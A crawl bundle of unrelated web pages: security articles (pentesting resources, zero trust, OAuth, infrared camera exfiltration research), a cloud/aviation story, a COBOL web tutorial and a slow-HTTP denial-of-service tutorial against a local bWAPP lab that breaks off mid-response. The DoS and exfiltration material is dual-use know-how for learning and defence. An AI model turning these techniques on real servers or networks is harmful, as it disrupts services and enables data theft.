internet cannot really work. So it proves that it is very integral part of networking. So it is recommended that those people, who want to have some good future in the networking field, should learn more and more about protocols. The reason behind is, that this knowledge doesn't just come handy in practical life, but also for clearing tests, one must know them. SPECIAL OFFER: GET 10% OFF Pass your Exam with ExamCollection's PREMIUM files! SPECIAL OFFER: GET 10% OFF Use Discount Code: A confirmation link was sent to your e-mail. Please check your mailbox for a message from [email protected] and follow the directions. Download Free Demo of VCE Exam Simulator Experience Avanset VCE Exam Simulator for yourself. Simply submit your e-mail address below to get started with our interactive software demo of your free trial.
<urn:uuid:7f8972ea-4798-460e-afed-7c162d257efd>
CC-MAIN-2022-40
https://www.examcollection.com/certification-training/ccna-ipv6-addressing-scheme-in-lan-wan-environment.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00268.warc.gz
en
0.909834
2,747
3.65625
4
What is Penetration Testing? Penetration TestingPenetration Testing is a form of security assessment that tests a system, network or software applicationsoftware application, with the objective of identifying security vulnerabilities. Penetration testing helps to assess the security posture of the target IT assets and its configurations. In short, penetration testing helps to identify potential loopholes that might be exploited by an attacker. To explain more in detail, there are multiple benefits of conducting the penetration testing on the organization’s systems. Also, there are different penetration testing approaches that can be achieved, as we described in our previous articles. Into the world of Penetration Testing: Where to start? For those who want to check out the field of penetration testing or just want to get a feel of what penetration testing looks like, we recommend free online platforms to brush up your skills in penetration testing and cybersecurity. There are different targets and penetration testing scopes (e.g. web, network and mobile). It is recommended to start with the web because it is both familiar and also the easiest entry point. Note that conducting penetration tests without permission and authorization is illegal but there are platforms that permit the legal practice of pentesting. Besides free YouTube resources on problem solving across different hacking platforms, some other platforms that are gamified include: For more advanced learning, check out these other practice grounds: - Hack the Box - Root Me - PortSwigger WebSecurity Academy - Damn Vulnerable Web Application (DVWA) - Buggy Web application (bWAPP) - OWASP WebGoat Penetration Testing Security Tools Below are commonly used operating systems and security tools for various technical assessments. Other Useful Resources - Infosec Institute Resource Center: A useful knowledge sharing area that provides news, updates, security tips, and technical information for penetration testing. - SecLists: SecLists is the security tester's companion. It is a collection of multiple lists used during security assessments. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, and web shells. - SANS Cyber Security Blog: Get the latest updates and news on penetration testing by SANS Institute. - Offensive Security Cheat Sheet by Red Teaming Experiments: A combination of exploit codes, network commands, and injection scripts that prove useful for penetration testing and red teaming. Penetration Testing in a Structured Manner If you are serious about pursuing the profession of a security practitioner, particularly as a penetration tester, it is important that we provide consistent coverage and quality of work for every engagement. Below are some reference frameworks to learn the standard methodologylearn the standard methodology: - NIST SP 800-115 - NSA IAM - CESG CHECK - CREST Tiger Scheme - The Cyber Scheme - PCI DSS - ABS Penetration Testing Guidelines - OWASP Top 10OWASP Top 10 - CWE Top 25 Most Dangerous Software Errors and - CREST Test Methodology While executing the penetration test using standardized methodology is important, we cannot emphasize enough the importance of being creative, curious, and needing to think out of the box. Your goal as a penetration tester is to find vulnerabilities and loopholes, that's why asking What If and Why questions is critical to identify scenarios beyond the imagination of developers and architects. Want to meet and be connected to other security professionals like you? Check out Infosec Conferences for the latest events in cybersecurity.
<urn:uuid:ddfea668-197a-48e7-b932-17e627f890bc>
CC-MAIN-2022-40
https://www.horangi.com/blog/pentesting-tools-and-resources-to-get-you-started
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00268.warc.gz
en
0.888403
743
2.875
3
The companies used to work on a castle-and-moat defense principle in the past. By default, everyone within the network is regarded as a trusted source. Traditionally, the companies used to work on a castle-and-moat security principle. In this model, it is not easy to obtain access to the application from outside the network. However, anyone inside the network is considered a trusted source by default. The issue with this system was that once anyone gained access to the network, the attacker could easily access all data. This vulnerability was increased because companies don't store their data in a single place now. The data is usually spread across multiple cloud vendors. It increases the difficulty as it is not possible to have security teams control the whole network. Thus, the requirement of zero-trust security arose. It offers multiple lines of defense. In addition, zero-trust security also provides reduced complexity and more business value. - These are the best antivirus software out there Understanding zero trust security Zero trust security for businesses is an IT network security model that requires verification of identity for every device or person trying to place an access request on a network. This applies to every person requesting access within or outside the network. It is a holistic approach where only authorized devices and users can access data and applications. It is done to protect the application from hackers and prevent. As compared to the original security model, stronger identification of user devices, restricted access to data, secure data transfer, and storage are some of the primary advantages of zero-trust security. Working of zero trust security system The basic principle behind zero-trust security for businesses is the assumption that hackers or attackers can be within the network or outside the network. Thus, no machines or users are automatically trusted by the system. Another fundamental feature of the protocol is the least-privilege access rule. It means that a user will get only the accesses which he needs or as much as he should know. Thus, not all users who drop access requests can get access to the sensitive parts of the application. In other words, the confidential data remains safe. The main issue with this new system is how to implement zero-trust for business. Since the workflow of every business is different, a single system cannot be used by all. Microsegmentation is utilized in zero-trust security networks. It is the process of breaking up the various security parameters into smaller zones to maintain an access rule for individual parts of the network. Ideally, a network containing sensitive data files and working on the above principle will contain several separate and secure zones. A user with access to only one of those zones will be unable to access the other zones' authorization for the same. Multi-factor authentication or MFA is another fundamental aspect of zero-trust security businesses. It simply means that a user will require evidence for authentication. Multiple popular online platforms like Google have incorporated MFA into their workflow. As of 2017, more than 60 percent of enterprise organizations have adopted MFA. Lastly, there are strict restrictions on device access. Zero-trust strategy systems keep track of how many devices and which devices are trying to access the network. They ensure that every device has proper authorizations. Thus, the network's attack surfaces reduce considerably. While there are no immediate disadvantages of zero-trust security models, especially for small businesses, setting up the system is complex and time-consuming. It involves defining the different kinds of users, devices, applications, etc., followed by defining the information they should be allowed access to. Setting up and defining the boundaries in a world where more data is stored on cloud systems becomes challenging. - Here's our list of the best VPN service available Making the perfect zero trust road map Adapting the perfect zero-trust road map helps businesses utilize the benefits of zero trust architecture. This security system focuses on reducing the potential for time-consuming, costly data breaches that not only cause data leaks but also reduce the momentum of the market. Small businesses can adopt these strategies to plan the zero-trust road map for their business to minimize the potential attack surfaces and hasten threat detection. Zero trust security for businesses can be established easily by using multifactor authentication for every user and partner account. According to a report by Centrify, even though more than 70 percent of threats and breaches of the security model occur because of privileged access, business owners don't adopt the model despite being well-aware of its benefits. Get the credentials of a shared account to minimize the risk of a data breach due to a rash usage of privileged access. Password vaults are mandatory for any business that relies on source code under development, proprietary data, parents, and IP ( intellectual property). These facts are critical for the growth of a company using a zero-trust strategy. Secured remote access To reduce the potential breaches, businesses should focus on devising a system that gives limited access to the remote workforce, i.e., employees from different departments only have access to the data they specifically work with. Real-time audits and monitoring Implementing zero trust security for businesses also involves adding a supporting system that keeps a check on the ongoing workflow thus, immediately pinpointing the starting of any security incident. The data from these audits can also be used to identify privileged credential use. Privileged access credentials Another common mistake made by small businesses is they keep the preset passwords for data protection in most of the applications. The preset passwords are not only weak but also well known and can be a weak point for hackers. Having implemented zero-trust cybersecurity protocols, organizations can enhance the security models required to safeguard their applications, resources, and confidential data. In today's world of distributed computer systems, zero-trust protocols can offer several business benefits as well. Organizations can improve the user interface and user experience and successfully migrate their application to a cloud system. Apart from the UI advantages, the cybersecurity system will reduce the time to detect data breaches, and it will also increase the visibility of the enterprise. The additional layer of data protection and application protection will improve brand perception and reduce considerable financial losses due to security breaches. Thus, migrating to the zero-trust security for businesses protocols will benefit the firms implementing it. Originally published at ITProPortal
<urn:uuid:d476b3fc-1b24-4cf7-8f14-83794608e446>
CC-MAIN-2022-40
https://guptadeepak.com/how-businesses-are-making-way-for-zero-trust/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00268.warc.gz
en
0.940059
1,292
2.9375
3
Cloud computing typically has nothing to do with real clouds in the atmosphere, but that's not the case with Boom Supersonic. In building a new generation of supersonic commercial jet aircraft, Denver-based Boom Supersonic is making extensive use of the cloud for design and test. In a session at the Amazon Web Services (AWS) re:Invent conference earlier this month, Blake Scholl (pictured), founder and CEO of Boom, outlined how his company is using the cloud to design and build an aircraft that provides supersonic air travel that would be cost-prohibitive using other means. Scholl is no stranger to Amazon, having worked for the company as a software engineer from 2001 until 2006. In 2014, he founded Boom Supersonic with the vision that it was possible and cost-effective to build a supersonic aircraft that could reduce the time to traverse the globe. Commercial supersonic air travel hasn't been available since 2003, when the Concorde jet was retired by British Airways and Air France. "So what does a revolution in high-performance computing have to do with a revolution in high-performance aircraft?" Scholl asked rhetorically during his AWS session. "What does cloud computing have to do with how we fly through actual clouds?" Scholl answered his own question by explaining how the cloud is the key to cost-efficiently building a sustainable supersonic jet that could one day revolutionize air travel. Reducing Travel Time with the Cloud Boom's mission is to make the work more accessible. Scholl noted that for the past 60 years it has taken nine hours for a commercial flight to fly from Seattle to Tokyo. By the end of the decade, his goal is that millions of everyday travelers will be enjoying the benefits of supersonic flight aboard a Boom Overture jet that is twice as fast as any aircraft flying today. That means that Tokyo will be just four and a half hours from Seattle and London will be just three and a half hours from New York. "Speed unlocks new possibilities for human relationships and business connections," he said. Cloud Computing at Supersonic Jet Speed For most of aviation history, aircraft were designed on paper with scale models that were built and tested in wind tunnels, Scholl said. That process is slow and costly and to date hasn't benefited as much as it should from cloud computing advancements. "Today to design a faster airplane, we need the fastest computers and computational methods," he said. "Leveraging AWS saved us literally years and millions of dollars because we can now test many designs quickly and inexpensively, and as such we can deliver a better airplane." Boom's first jet is the experimental XB-1 that was rolled out in October. When designing the XB-1, Boom made use of AWS high-performance computing (HPC) cloud clusters that typically had 500 or more compute cores. Hundreds of possible airplane designs flew through virtual wind tunnel tests, encompassing thousands of scenarios, according to Scholl. "Because AWS allowed us to run many hundreds of these simulations concurrently, we achieved a sixfold increase in team productivity," he said. "Simply put, without AWS today, we would be looking at a sketch of a future airplane concept, not an assembled jet, because years of design work would still remain." The Boom Overture Supersonic Jet and the Cloud The XB-1 is a critical stepping stone for Boom's ultimate goal: the Overture jet, which is intended to be a commercially viable supersonic aircraft. Scholl said 525 terabytes of XB-1 design and test data are already on AWS, and he expects that Boom will generate petabytes of data as it progresses through the development of the Overture jet. "Because AWS lets us put compute next to data, we can run models across our dataset, gaining actionable insights," he said. "For example, we're using machine learning to calibrate simulations for wind tunnel results, accelerating model convergence and allowing us to deliver a more optimized aircraft." To date, Boom has used 53 million core hours of compute at AWS to design and test the XB-1, and Scholl expects to use more than 100 million core hours as it finalizes the design for the Overture airliner. "Think of how many industries AWS has already transformed, and today supersonic flight is one of those surprising benefits of computing," he said. "Just as AWS is reinventing computing, at Boom, we're reinventing travel."
<urn:uuid:b706d838-d093-48ae-a2dd-5f5311edbbe3>
CC-MAIN-2022-40
https://www.datacenterknowledge.com/amazon/how-cloud-computing-reinventing-supersonic-air-travel
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00268.warc.gz
en
0.963863
930
2.578125
3
Secure your business with CyberHoot Today!!! OAuth, also known as Open Authorization, is an open standard authorization framework for token-based authorization on the internet. OAuth enables an end-user’s account information to be used by third-party services, such as Facebook and Google, without exposing the user’s account credentials to the third party. It acts as an intermediary on behalf of the end-user, providing the third-party service with an access token that authorizes specific account information to be shared. The process for obtaining the token is called an authorization flow. OAuth 1.0 was first released in 2007 as an authorization method for the Twitter Application Program Interface (API). In 2010, the IETF OAuth Working Group published the first draft of the OAuth 2.0 protocol. Like the original OAuth, OAuth 2.0 provides users with the ability to grant third-party application access to web resources without sharing a password. However, it is a completely new protocol and is not backward compatible with OAuth 1.0. Updated features include a new authorization code flow to accommodate mobile applications, simplified signatures, and short-lived tokens with long-lived authorizations. This provides end-users the ability to revoke tokens more easily when desired. OAuth is often used to consolidate user credentials and streamline the login process for users so that when they access an online service, they don’t have to reenter information that other online accounts already possess. OAuth is the underlying technology used for website authentication by sites that let users register or log in using their account with another website such as Facebook, Twitter, LinkedIn, Google, GitHub, or Bitbucket. For example, if a user clicks on the Facebook login option when logging into another website, Facebook authenticates them, and the original website logs them in using permission obtained from Facebook. What does this mean for an SMB or MSP? CyberHoot Bottom line: If you really want to implement OAuth in your SMB, stick to the mainstream vendor implementations from companies like okta, Azure AD, or RSA. Each has been around for many years, faced much scrutiny of its codebase, and is well funded to mitigate risks in its API. Also, make sure to pair any OAuth source authentication service with multi-factor authentication before granting tokens to 3rd parties. Security Awareness Training – The first step in cybersecurity always comes back to raising employee awareness. Once the employees become more aware of the risks and dangers that these OAuth mechanisms present, they will be more hesitant to use them. Enable Multi-Factor Authentication – The single best thing you can do to improve your organization’s cloud security is to turn on and enforce multi-factor authentication (MFA) for all possible accounts. This practice is especially true for your primary email and collaboration platforms because it reduces the harm an attacker can cause with stolen credentials. Policies – Organizations should create a policy that enforces employees to submit requests for third-party apps. This can be implemented in your organization’s Acceptable Use Policy (AUP). Employ SaaS Security Monitoring – SaaS security monitoring is a crucial layer of security for your SaaS stack. It enables you to manage employee access to your required SaaS apps by department, consolidate licenses, and give you unprecedented visibility into your SaaS stack. Blissfully is one excellent example of a platform that can do all three and more; it’s a key SaaS security element when putting your IT stack together. Manage SaaS Access & Passwords – Some SaaS applications cannot tie into SSO solutions as mentioned previously. For these situations, CyberHoot recommends using a Password Manager. Reputable Password Managers such as LastPass, 1Password, DashLane, or Bitwarden allow users to generate strong, unique 14+ character passwords, store credentials for websites and store encrypted Secure Notes. These tools are also valuable as they allow users to securely share credentials or notes with trusted employees or clients. Practical advice and common sense apply here. Make sure your users know not to blindly accept all the access permissions requested by a SaaS application no differently than denying a phone app access to your contact list or denying access to your location data by default. If it doesn’t need the access to function fundamentally, your default position should always be to deny access. CyberHoot’s Minimum Essential Cybersecurity Recommendations The following recommendations will help you and your business stay secure with the various threats you may face on a day-to-day basis. All of the suggestions listed below can be gained by hiring CyberHoot’s vCISO Program development services. - Govern employees with policies and procedures. You need a password policy, an acceptable use policy, an information handling policy, and a written information security program (WISP) at a minimum. - Train employees on how to spot and avoid phishing attacks. Adopt a Learning Management system like CyberHoot to teach employees the skills they need to be more confident, productive, and secure. - Test employees with Phishing attacks to practice. CyberHoot’s Phish testing allows businesses to test employees with believable phishing attacks and put those that fail into remedial phish training. - Deploy critical cybersecurity technology including two-factor authentication on all critical accounts. Enable email SPAM filtering, validate backups, and deploy DNS protection, antivirus, and anti-malware on all your endpoints. - In the modern Work-from-Home era, make sure you’re managing personal devices connecting to your network by validating their security (patching, antivirus, DNS protections) or prohibiting their use entirely. - If you haven’t had a risk assessment by a 3rd party in the last 2 years, you should have one now. Establishing a risk management framework in your organization is critical to addressing your most egregious risks with your finite time and money. - Buy Cyber-Insurance to protect you in a catastrophic failure situation. Cyber-Insurance is no different than Car, Fire, Flood, or Life insurance. It’s there when you need it most. Each of these recommendations, except cyber-insurance, is built into CyberHoot’s product and virtual Chief Information Security Officer services. With CyberHoot you can govern, train, assess, and test your employees. Visit CyberHoot.com and sign up for our services today. At the very least continue to learn by enrolling in our monthly Cybersecurity newsletters to stay on top of current cybersecurity updates. To learn more about how OAuth works, watch this short 2-minute video: CyberHoot does have some other resources available for your use. Below are links to all of our resources, feel free to check them out whenever you like: - Cybrary (Cyber Library) - Press Releases - Instructional Videos (HowTo) – very helpful for our SuperUsers! Note: If you’d like to subscribe to our newsletter, visit any link above (besides infographics) and enter your email address on the right-hand side of the page, and click ‘Send Me Newsletters’.
<urn:uuid:ce990bed-89ed-4c08-b747-1e57a4dfa08f>
CC-MAIN-2022-40
https://cyberhoot.com/cybrary/oauth/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00268.warc.gz
en
0.91284
1,521
2.546875
3
Organizations use to protect their internal networks from Internet attacks by using firewalls, intrusion detection systems(IDSs) and intrusion prevention systems (IPSs). For a higher degree of protection, so-called ‘air-gap‘ isolation is used. Security researchers from Ben-Gurion University of the Negev (BGU) introduced a new covert channel which uses the Infrared and Surveillance camera as a Communication Channel and they Named as aIR-Jumper. Targeting air-gapped Computers Air-gap computers need to be compromised with Malware by using Social Engineering methods are by using Insiders. Once deployed malware search for Surveillance camera by using Open ports, IP address and MAC header Response. Once network mapped malware tries to connect with cameras by stealing the password from Computer or by exploiting the vulnerability to control the IR LEDs. Researchers published a PoC explaining technical details. Data Exfiltration and Infiltration – Surveillance Cameras With Exfiltration scenario, Malware that presents inside the organization can get to the surveillance cameras across the local network and controls the IR illumination. Then it transfers sensitive data like PIN codes, passwords, and encryption keys are then modulated, encoded and transmitted over the IR signals.An attacker who is sitting in the line of sight can retrieve these IR signals and decode it. Many surveillance and security cameras monitor public areas which allow attackers to easily establish a line of sight with them. Researchers said For testing and evaluation, we executed a program which encodes a binary file and transmits it by means of the IR LEDs. The program catches the camera’s IP, the encoding along with the IR intensities’ (amplitudes) timing parameters and the binary file to transmit. With the infiltration scenario, an attacker standing in a public area uses IR LEDs to send hidden signals to the surveillance camera(s). Binary data such as command and control (C&C) and beacon messages are encoded on top of the IR signals. The signals covered in the video stream are then intercepted and decoded by the malware residing on the network. The exfiltration and infiltration can be combined to establish bidirectionally, ‘air-gap’ communication between the compromised network and the attacker. Since surveillance cameras can receive light in the IR wavelength, it is conceivable to deliver data into the organization through the video stream recorded by the surveillance cameras, using covert IR signals. Detection and Countermeasures Detection can be done at the network level by deep packet inspection, by monitoring the network traffic from hosts in the network to the surveillance cameras. Disabling the IR LEDs in the surveillance cameras may prevent the exfiltration channel presented in this paper. The infiltration channel can be prevented by adding an IR filter to the surveillance camera.
<urn:uuid:3762f40a-ca53-4b6d-b457-9c0468eb5ed8>
CC-MAIN-2022-40
https://gbhackers.com/surveillance-cameras-infrared-light/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00468.warc.gz
en
0.896116
577
2.890625
3
|Introduction to Web Applications||Completing and Running Your Web Application| In this and the next session you create a Web application. In this session, you use HTML Page Wizard and Form Designer to create the user interface and then use Internet Application Wizard to create the program to process the data. You use the IDE, your Web browser, and the Web server software, Solo, included in NetExpress, to run the application to see the appearance of the interface. In the next session, Completing and Running Your Web Application, you add the business logic to the program and run the complete application. You need to have read the chapter Start Here for the Tutorials, worked through the first session Using NetExpress, and read the chapter Introduction to Web Applications, before you do this session. You use HTML Page Wizard to create forms for display on a Web browser. These are the user interface to your application. From within this Wizard, you enter Form Designer, where you design and edit their layout. You use Internet Application Wizard to generate a server-side COBOL program to handle the forms. With an HTML form you can specify the order of the controls, but the exact layout is normally determined by the browser that displays it. However, Form Designer gives you facilities to specify the layout exactly. The server-side program is central to a Web application. It accepts data from an input form, and outputs data in one or more output forms. A special case is where there's just one form, used for both input and output. This is the kind of application we create in this session. If you have closed NetExpress, open it as before. If any project window or other windows are open, close them. In this sample session you: You could start by creating a project in the way described in the chapter Using NetExpress, but if you go straight ahead and create the form NetExpress will give you an opportunity to create the project. To create a form: The project window for the project appears. So does the first page of the HTML Page Wizard. Normally, when you design an HTML form, you can specify only the order of the objects you put on it. Their exact positions are determined by the browser used to view the form. However, in NetExpress you can specify that part of your form is a positional form. Objects within this will be placed exactly where you put them. By clicking Positional Form.htm here you choose that the form will contain one positional form, covering most of its area. Remember that in Web terminology a Web page that contains fields for a user to fill in is called a form. Do not confuse this with the positional form within it. This specifies that your HTML form will be called mypage.htm. The normal extension for HTML files is .htm. Cross-platform specifies the method NetExpress uses to ensure objects in your positional form are positioned as you wish. Cross-platform forms use HTML tables for this. In Dynamic HTML, style attributes are used. HTML Tables are supported by more browsers. Dynamic HTML offers more exact positioning, but is only supported by Internet Explorer 4.0. Remember your forms will be seen by users with different browsers. You might get one or both of these messages if this session has been run previously. Otherwise the next dialog box appears straight away. The next dialog box shows a summary of what you have selected. The HTML Wizard generates the form, and finishes. The names of the generated files are added to the project, then the project is scanned for dependencies. Then the IDE opens a form design window, recognizable by its dotted grid background, and three related windows. An extra toolbar appears, with three tabs. It is called the object toolbar, and contains objects you might want to add to a form. Extra menus Page and Arrange appear on the menu bar. This also starts the Web server software, Solo, included in NetExpress; you may notice the Solo icon appearing in the Windows taskbar tray. You can ignore it for now - Form Designer needs it running in the background. Your IDE now looks something like Figure 8-1. Figure 8-1: The IDE with Form Designer's Windows Open The four new windows are: The window with the dotted grid background is where you design your form. The form mypage.htm that you just created is loaded ready for you to design it. Notice that most of its area is taken up by a rectangle shown as highlighted. This is the positional form. The window at the top right shows you all the controls on your form. You can rename controls by right-clicking on them and selecting Rename from the context menu. The window below the control tree window shows the properties for the object currently selected in the form design window. Property names are listed down the left, and the corresponding values down the right. You can edit any property by clicking in its value field. The window at the bottom right displays help for the property list window. If you click any field in the property list window, help for that field appears in the help window. You may want to drag the form design window aside for a moment to see how the project has changed. You may want to move windows around your IDE or resize them so you can see them all clearly. To design your form: This creates an entry field - a field where your end-user can enter or display data - at the place where you clicked. You can drag it around with the mouse after you have placed it, by putting the mouse pointer in its border and holding down the mouse button. Put it towards the right-hand side of the window. Notice the Name property in the property list window (you may have to click in the list and use the arrow keys to go up or down the list to see it). It is input1. This will be the data-name for this field in the COBOL program you generate later. A rectangle appears for a moment, and then both fields are highlighted. This lines up the two fields. Notice the Name property in the Property List for this second entry field is input2. You should now have a form that looks something like Figure 8-2. Figure 8-2: The Form You've Created in the Form Design Window The form design window and its associated windows all close. You don't strictly need to close them here - you could keep them open through the next section - but closing them prevents the screen getting too crowded. You use Internet Application Wizard to create the server-side program: The first page of Internet Application Wizard appears. On this page you choose which of the three methods of creating an application, as described in the chapter Introduction to Web Applications, you wish to use. In the lower part of the dialog box, HTML Form(s) is automatically selected. The page that now appears enables you to give a name to your server-side program, and specify the input form and one or more output forms that it is to use. This is the filename that will be given to your server-side program. Unless the project folder has been used previously, mypage will be the only form present. The Input File/Form field is automatically set to mypage. A server-side program has one input form, and one or more output forms. A program like this one, which has just one form for both input and output, is called a symmetric server-side program. This displays a dialog box showing a summary of what you have selected. The Internet Application Wizard generates the program, and finishes. The names of the generated files are added to the project, then the project is scanned for dependencies. Internet Application Wizard then closes. You have now created your user interface. The Wizards and Form Designer have created the following files for you and added them to the project (you may have to expand the tree view in the project window by clicking the "+" signs to see them all): The following file is shown in the right-hand pane only: It has also added to the project the following object files, created when you build the project: It has also created several copyfiles (extensions .cp*). Their purpose is described in comments in the .cbl file. Although the filenames are shown above in lower case, some might appear in upper case in the project. Filenames are not case sensitive. If you ever need to update the form, you simply double-click on mypage.htm in the project window, and Form Designer opens. When you save the updated form, the copyfiles are regenerated, so you should not edit them directly.You can however edit the .cbl program that the Wizard generated. If you're reading this book in your Web browser, you should start a new instance of your browser (use the New function on its File menu) so that you can still see the book during this section. To see how your form looks in your Web browser: This opens the form for editing again. We are not going to make any more changes - we have opened the form for editing just to make the Page and Arrange menus appear on the menu bar again. This starts your Web browser, if it's not already running, and loads your form. It would also start Solo, if Solo were not already running. This is explained in more detail in the next session, Completing and Running Your Web Application. For now you are just checking to see how the form looks in your browser. You'll notice that the two entry fields contain ":f-Input1" and ":f-Input2". You can ignore these; they are placeholders for the data that will be displayed when your server-side program displays the form. If you want, you can now see your server-side program running, although you haven't yet added the business logic. NetExpress builds the .exe file. Your server-side program now runs and displays the form in your browser. You'll notice that the placeholders are no longer visible. The IDE is automatically minimized. The program runs and redisplays the form, but nothing is displayed in the second field as you have not added any business logic yet. We will do this in the next session, Completing and Running Your Web Application. If you opened a second instance of your Web browser to display the form, close it. In the next session, Completing and Running Your Web Application, you get this application working fully. If you're planning to go onto that session right away, you can keep the project open. If you want to take a break first, you can close the project, and open it again at the start of the next session. Or you can close NetExpress entirely, with or without closing the project first. You can also close Solo, by right-clicking on the Solo icon in the Windows taskbar tray and clicking Exit on the popup menu. Copyright © 1998 Micro Focus Limited. All rights reserved. This document and the proprietary marks and names used herein are protected by international law. |Introduction to Web Applications||Completing and Running Your Web Application|
<urn:uuid:bd54cf4d-ad2b-4869-be97-d4e0662f147e>
CC-MAIN-2022-40
https://www.microfocus.com/documentation/net-express/nx30books/gsform.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00468.warc.gz
en
0.906663
2,311
3.09375
3
Platform as a Service (PaaS) NIST defines PaaS cloud computing as: “The capability provided to the consumer is to deploy onto the cloud infrastructure consumer-created or acquired applications created using programming languages, libraries, services, and tools supported by the provider. The consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, or storage, but has control over the deployed applications and possibly configuration settings for the application-hosting environment.” PaaS vendors offer a toolkit and standards for development and channels for distribution and payment. The computing platform typically includes an operating system, programming-language execution environment, database, and web server. Application developers develop and run their software on the cloud platform. Some PaaS solutions automatically scale computing and storage resources to match demand so that administrators do not have to allocate the additional resources required manually.Back to Glossary
<urn:uuid:7a920532-ea7c-46e7-a471-818cee8fe26b>
CC-MAIN-2022-40
https://abusix.com/glossary/platform-as-a-service-paas/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00468.warc.gz
en
0.900541
189
3.015625
3
Artificial intelligence (AI) will not wipe out the need for human workers and create a dystopian environment run by evil machines . Instead, the technology will help diversify human thinking and bolster collaboration between people and automated systems. That’s the view of a newly released report from consulting firm Tata Communications, which is based on a survey of 120 global business leaders. It includes input from in-depth interviews with entrepreneurs, executives, and thought-leaders, as well as discussion forums featuring internationally renowned experts from the fields of AI, machine learning, design, art, government, politics, ethics, entrepreneurship, behavioural economics, journalism, engineering, and human resources. The study envisions a positive impact of AI in the workplace of the future. Among the key findings of the study: A huge majority of the leaders surveyed (90 percent) agree that cognitive diversity is important for management; three quarters expect AI to create new roles for their employees; and 93 percent think AI will enhance decision making. “The prevalent narrative around AI has focused on a ‘singularity’–a hypothetical time when artificial intelligence will surpass humans,” said Ken Goldberg, a professor at the University of California at Berkeley and co-author of the report. “But there is a growing interest in ‘multiplicity’, where AI helps groups of machines and humans collaborate to innovate and solve problems.” The survey of business leaders indicates that the concept of multiplicity, the positive and inclusive vision of AI, is gaining ground, Goldberg said. AI is now being viewed as a new category of intelligence that can complement existing categories of emotional, social, spatial, and creative intelligence, noted Vinod Kumar, CEO and managing director at Tata Communications and also a co-author of the study. Multiplicity is transformational because it can enhance cognitive diversity, combining categories of intelligence in new ways to benefit all workers and businesses, Kumar said.
<urn:uuid:761b8d64-65a4-41a0-8f5f-bdbaefc2195e>
CC-MAIN-2022-40
https://swisscognitive.ch/2018/09/07/fear-not-ai-doesnt-have-to-lead-to-a-bleak-world/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00468.warc.gz
en
0.942737
395
2.734375
3
Asymmetric DoS, Slow HTTP AttackThe story of David and Goliath Have you ever heard the story of David and Goliath? David, a young boy, goes out to confront a giant, named Goliath. David is the underdog in this fight and is expected to lose. But, everyone underestimates David and his prowess with a slingshot. When David ultimately kills Goliath, he demonstrates that even a little guy can triumph over the biggest and strongest of enemies. Fine! Today we are going to talk about unequal scenarios. Furthermore, we are going to battle one ourselves. Let’s get started So, let’s imagine, for a moment, that all you need to kill the giant, that everyone fears, is a little slingshot, not a big mace, nor the strength of a thousand men. Sound crazy? Well, it is. But it’s possible. A cyber attack is considered "asymmetric" in the sense that you only need a few resources, in this case, a laptop, in order to cause a considerable amount of damage, malfunction or failure in the server. A very real case of David vs. Goliath. If we push hard enough, the server is going to stop providing the service to other users, in other words, we will cause a Denial of Service (DoS). How does a slow http attack work? Imagine a line at the local fast food restaurant. A customer at the head of the line can’t decide if he wants a burger or a hot-dog. People behind him in line are getting mad; they aren’t getting their food because he is holding up the whole line. If you look at it in more detail, all this customer needed to do was to "not know what to order". His indecision basically caused a denial of service for every other person waiting behind him at the counter, i.e., A DoS. Now imagine the same line, but the customer at the counter knows what he wants to order, and he’s ordering a thousand burgers and a hundred hot-dogs. Again, this means everyone behind him in line will have to wait while his order is filled. The restaurant can take no more orders until his is complete. The HTTP protocol works similarly, it requires requests to be fully received by the final user before they are processed. Two things can happen, if a request is not completed, the server can either wait or set the request as timed out after some few seconds. However, if you let the request complete, but at a slow rate, then the server will keep the resource busy waiting for the end of the data. What would happen if the customer orders a thousand burgers and a hundred hot-dogs, but he can’t decide which sauces and drinks to order with them? And, to make matters worse, he seems to be intentionally indecisive and he’s speaking very slowly. This is exactly the idea behind a slow HTTP attack. A web server keeps its active connections in a relatively small connection pool. We will try to tie all the connections in this pool to slow requests, making the server reject other users. Let’s do an HTTP request First, let’s run a bWAPP server on ip 192.168.56.101. Figure 1. bWAPP server For now, let’s assume that we are at: And we entered in the form: Figure 2. XSS page and input Once we access a page, the browser is going to ask the server for some resources and we can see these requests and responses from the command line using (or Google Chrome, or Firefox, or The process using curl is: $ # login to the server so we can see as a logged user the page we want $ curl -L -c post_login_cookie 'http://192.168.56.101/bWAPP/login.php' \ --data 'login=bee&password=bug&security_level=0&form=submit' $ # result: a file is saved with name 'post_login_cookie' $ $ # submit a post request with the data we want on the field $ curl -L -b post_login_cookie -v \ -d "firstname=test1&lastname=test2&form=submit" \ http://192.168.56.101/bWAPP/xss_post.php $ # output is displayed to console, we'll see it in a moment As mentioned before, every single resource is going to have a request and a corresponding response. In other words, we are asking the server for the xss_post.php resource with the parameters: Since we want to se an HTML page, curl asks for it: curl, server request output. * Trying 192.168.56.101... * TCP_NODELAY set * Connected to 192.168.56.101 (192.168.56.101) port 80 (#0) > POST /bWAPP/xss_post.php HTTP/1.1 > Host: 192.168.56.101 > User-Agent: curl/7.58.0 > Accept: */* > Cookie: PHPSESSID=5fvb1fr053gmc2f91ooicvf1f5; security_level=0 > Content-Length: 41 > Content-Type: application/x-www-form-urlencoded And the server replies with: curl, server response output. * upload completely sent off: 41 out of 41 bytes < HTTP/1.1 200 OK < Date: Thu, 15 Nov 2018 